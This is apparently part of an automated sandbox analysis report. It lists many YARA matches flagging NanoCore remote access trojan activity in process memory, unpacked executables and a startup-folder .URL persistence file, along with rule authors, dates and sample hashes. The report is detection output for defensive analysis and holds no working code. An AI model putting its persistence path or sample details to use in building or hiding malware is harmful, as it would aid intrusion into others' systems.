        Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: dropped/znytpstdcrwsisx.fr.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.35a3c74.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.35a3c74.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.35917f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.35917f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.5610000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.5610000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.3201358.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.3201358.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
